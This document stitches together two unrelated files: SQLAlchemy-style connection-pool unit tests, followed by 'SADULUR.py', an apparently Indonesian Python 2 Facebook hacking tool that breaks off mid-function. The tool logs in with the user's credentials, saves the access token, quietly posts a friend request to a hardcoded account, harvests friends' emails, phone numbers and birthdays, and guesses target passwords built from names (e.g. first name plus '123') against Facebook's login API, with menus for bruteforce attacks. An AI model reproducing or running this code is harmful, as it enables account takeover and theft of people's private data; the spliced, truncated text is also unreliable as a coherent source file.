@testing.uses_deprecated(r".*Use event.listen")
def test_listeners_callables(self):
def connect(dbapi_con, con_record):
counts[0] += 1
def checkout(dbapi_con, con_record, con_proxy):
counts[1] += 1
def checkin(dbapi_con, con_record):
counts[2] += 1
i_all = dict(connect=connect, checkout=checkout, checkin=checkin)
i_connect = dict(connect=connect)
i_checkout = dict(checkout=checkout)
i_checkin = dict(checkin=checkin)
for cls in (pool.QueuePool, pool.StaticPool):
counts = [0, 0, 0]
def assert_listeners(p, total, conn, cout, cin):
for instance in (p, p.recreate()):
eq_(len(instance.dispatch.connect), conn)
eq_(len(instance.dispatch.checkout), cout)
eq_(len(instance.dispatch.checkin), cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0)
p.add_listener(i_all)
assert_listeners(p, 1, 1, 1, 1)
p.add_listener(i_connect)
assert_listeners(p, 2, 1, 1, 1)
p.add_listener(i_checkout)
assert_listeners(p, 3, 1, 1, 1)
p.add_listener(i_checkin)
assert_listeners(p, 4, 1, 1, 1)
del p
p = self._queuepool_fixture(listeners=[i_all])
assert_listeners(p, 1, 1, 1, 1)
c = p.connect()
assert counts == [1, 1, 0]
c.close()
assert counts == [1, 1, 1]
c = p.connect()
assert counts == [1, 2, 1]
p.add_listener(i_checkin)
c.close()
assert counts == [1, 2, 2]
class QueuePoolTest(PoolTestBase):
def testqueuepool_del(self):
self._do_testqueuepool(useclose=False)
def testqueuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1)
def status(pool):
tup = pool.size(), pool.checkedin(), pool.overflow(), \
pool.checkedout()
print('Pool size: %d Connections in pool: %d Current '\
'Overflow: %d Current Checked out connections: %d' % tup)
return tup
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
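# Note on the status tuples asserted above: overflow() reports checked-out
# connections beyond pool_size (roughly checkedout - size), so it starts at
# -pool_size with nothing checked out, e.g. (3, 0, -2, 1) after one checkout,
# and only goes positive once more than pool_size connections are out.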
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=0,
timeout=2)
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
now = time.time()
try:
c4 = p.connect()
assert False
except tsa.exc.TimeoutError:
assert int(time.time() - now) == 2
def test_timeout_race(self):
# Test a race condition where the initial connecting threads all race to
# queue.Empty and then block on the mutex, each consuming a connection as
# it goes in. When the limit is reached, the remaining threads get a
# TimeoutError even though they never actually waited out the timeout on
# queue.get(). The fix involves re-checking the timeout within the mutex
# and, if it has expired, unlocking and throwing the thread back to the
# start of do_get().
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=.05),
pool_size=2,
max_overflow=1, use_threadlocal=False, timeout=3)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should be under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
dbapi = MockDBAPI()
def creator():
time.sleep(.05)
return dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=3, timeout=2,
max_overflow=max_overflow)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join()
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(creator=creator,
pool_size=2, timeout=timeout,
max_overflow=max_overflow)
def waiter(p):
conn = p.connect()
time.sleep(.5)
success.append(True)
conn.close()
time.sleep(.2)
c1 = p.connect()
c2 = p.connect()
for i in range(2):
t = threading.Thread(target=waiter, args=(p, ))
t.setDaemon(True) # so the tests don't hang if this fails
t.start()
c1.invalidate()
c2.invalidate()
p2 = p._replace()
time.sleep(2)
eq_(len(success), 12)
@testing.requires.python26
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator1():
canary.append(1)
return dbapi.connect()
def creator2():
canary.append(2)
return dbapi.connect()
p1 = pool.QueuePool(creator=creator1,
pool_size=1, timeout=None,
max_overflow=0)
p2 = pool.QueuePool(creator=creator2,
pool_size=1, timeout=None,
max_overflow=-1)
def waiter(p):
conn = p.connect()
time.sleep(.5)
conn.close()
c1 = p1.connect()
for i in range(5):
t = threading.Thread(target=waiter, args=(p1, ))
t.setDaemon(True)
t.start()
time.sleep(.5)
eq_(canary, [1])
p1._pool.abort(p2)
time.sleep(1)
eq_(canary, [1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=2, timeout=None,
max_overflow=0)
c1 = p.connect()
c2 = p.connect()
conns = [c1.connection, c2.connection]
c1.close()
eq_([c.closed for c in conns], [False, False])
p.dispose()
eq_([c.closed for c in conns], [True, False])
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_([c.closed for c in conns], [True, False])
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is conns[1]
def test_no_overflow(self):
self._test_overflow(40, 0)
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_mixed_close(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = None
assert p.checkedout() == 1
c1 = None
lazy_gc()
assert p.checkedout() == 0
lazy_gc()
assert not pool._refs
def test_overflow_no_gc_tlocal(self):
self._test_overflow_no_gc(True)
def test_overflow_no_gc(self):
self._test_overflow_no_gc(False)
def _test_overflow_no_gc(self, threadlocal):
p = self._queuepool_fixture(pool_size=2,
max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
still_opened = len([c for c in strong_refs if not c.closed])
eq_(still_opened, 2)
@testing.requires.predictable_gc
def test_weakref_kaboom(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2 = None
del c1
del c2
gc_collect()
assert p.checkedout() == 0
c3 = p.connect()
assert c3 is not None
def test_trick_the_counter(self):
"""this is a "flaw" in the connection pool; since threadlocal
uses a single ConnectionFairy per thread with an open/close
counter, you can fool the counter into giving you a
ConnectionFairy with an ambiguous counter. i.e. its not true
reference counting."""
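# Comment-only illustration of the counter behaviour described in the
# docstring above (hypothetical attribute names, not the real ConnectionFairy):
#
#   fairy = thread_local_fairy()    # same object returned for this thread
#   fairy.__counter += 1            # each connect() bumps the counter
#   fairy.close()                   # each close() decrements it; the DBAPI
#                                   # connection only goes back to the pool
#                                   # when the counter reaches zero, so an
#                                   # unbalanced close() sequence leaves the
#                                   # checkout count ambiguous.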
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = p.connect()
c2.close()
self.assert_(p.checkedout() != 0)
c2.close()
self.assert_(p.checkedout() == 0)
def test_recycle(self):
p = self._queuepool_fixture(pool_size=1,
max_overflow=0,
recycle=3)
c1 = p.connect()
c_id = id(c1.connection)
c1.close()
c2 = p.connect()
assert id(c2.connection) == c_id
c2.close()
time.sleep(4)
c3 = p.connect()
assert id(c3.connection) != c_id
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(reset_on_return=None, pool_size=1, max_overflow=0)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._use_threadlocal is False
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c_id = c1.connection.id
c2 = p.connect()
assert c2.connection.id != c1.connection.id
dbapi.raise_error = True
c2.invalidate()
c2 = None
c2 = p.connect()
assert c2.connection.id != c1.connection.id
con = c1.connection
assert not con.closed
c1.close()
assert con.closed
def test_threadfairy(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c1.close()
c2 = p.connect()
assert c2.connection is not None
class SingletonThreadPoolTest(PoolTestBase):
def test_cleanup(self):
self._test_cleanup(False)
def test_cleanup_no_gc(self):
self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
p = pool.SingletonThreadPool(creator=dbapi.connect,
pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(.1)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(p._all_conns) == 3
if strong_refs:
still_opened = len([c for c in sr if not c.closed])
eq_(still_opened, 3)
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect()
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
creator = lambda: dbapi.connect('foo.db')
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
SADULUR.py
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Closed'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;97m█████████\n \x1b[1;97m█▄█████▄█ \x1b[1;96m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;97m█ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;97m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;97m█ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mSADULUR v6.1\n \x1b[1;97m█████████ \x1b[1;96m«==========✧==========»\n \x1b[1;97m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Mr.Sadut \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/Cyber Domba\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/Sadoet75\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝"
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBO6OK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mEmail \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mSandi \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPhone Number\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mPhone Number\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mBirthday\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mBirthday\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mNot found'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] User not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Checker'
print '║-> \x1b[1;37;40m6. Get ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
